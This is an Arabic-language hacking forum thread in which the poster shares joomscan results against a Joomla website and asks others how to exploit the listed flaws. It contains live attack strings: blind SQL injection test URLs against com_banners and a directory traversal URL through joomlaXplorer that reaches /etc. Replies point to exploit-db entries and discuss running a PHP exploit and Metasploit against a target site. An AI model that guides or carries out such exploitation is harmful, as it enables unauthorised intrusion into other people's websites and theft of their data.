الرجاء المساعدة في استغلال ثغرات بـ سكربت جوملا

[wolio dark]

السلام عليكم و رحمة الله و بركاته

أخواتي انا فحصت موقع مركب سكربت جوملا بـ آداة joomscan عن طريق الباك تراك 4 و وجدة هذه الثغرات لكن ما عرفت كيف استغلها هل ممن الممكن شرح ذالك لي

Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact th
ere are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes


Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Vulnerable? Yes


Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes



Info -> Component: joomlaXplorer Local Directory Traversal Vulnerability
Versions Affected: 1.6.2 <=
Check: /components/com_joomlaxplorer/
Exploit:/index.php/?option=com_joomlaxplorer&action=show_error&dir=.. %2F..%2F..%2F%2F..%2F..%2Fetc
Vulnerable? Yes

[wolio dark]

Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /joomla/administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/M...%20PROTECT.pdf
Vulnerable? Yes

[محمد50]

يا الغالي الموقع هاذ مليروم محدفوف يا الغالي انا اعطيل البديل
http://www.milw0rm.com/
هاذ البديل لي مليروم
http://www.exploit-db.com
باااااااااااااااي

[محمد50]

وتلقي كل جديد والجديد قي انا الدي منزله في قيسم
هاذ الرابط
http://www.exploit-db.com/webapps/
وخلاص
بااااااااااااااي

[wolio dark]

يا اخي انا اعرف هذا على العموم شكراا

[a.i.a]

السلام علبكم
عندي نفس السوال من فضلكم
هل أحد فيكم نجح من قبل في استغلال هذه الثغرة ؟؟؟

كود:

Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities 
Versions effected: Joomla! 1.5.12 
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

شكرا

[MaFia]

الاكسبلويت
في الميل ورم لكن اغلق من عامين

لكن تقريبا هذا الاستغلال جربه
http://www.exploit-db.com/exploits/10183/

ترجم الثغره

[خالد سعودي]

اخي الكريم الاتسغلال موجود بعد كلمة Exploit بعدها تحط الاستغلال بعد رابط الموقع
على فكرة تري الاداء ماتعطيك النتائج 100%
موفق

[a.i.a]

نعم إخوتي، كنت جربت هذا exploit لكن بعدما أدخل هذه command :
php myfile.php targetsite /joomla
أحصل على: [-] Error in connection, exiting

وجدت expolit اخر لكن لا أعلم إن كان صالحا:
http: // exploit-db.com / exploits/ 16906/
و لا أعرف كيف أمزجه مع Metasploit ، هل أنسخ الملف مع الملفات فيexploits ditrctory الخاص بالميتاسبلويت ؟؟؟
و كيف أشغله ؟؟


أرجوا المساعدة، أعرف أن هذه النسخة من joomla قديمة لذلك أريد نصح صديق لي بتحديث نسخة موقعه، بتجريب هذه الثغرة.
جزاكم الله خيرا.

[a.i.a]

لا أحد عنده إجابة لاستغلال هذه الثغرة القديييييمة ؟؟؟

[hck]

بالتوفيق

[a.i.a]

كيف أخي hck !!!!!!!!

[senderman]

will see

[Niue]

مشكووووووووووور

[xpao]

شكرا على الردود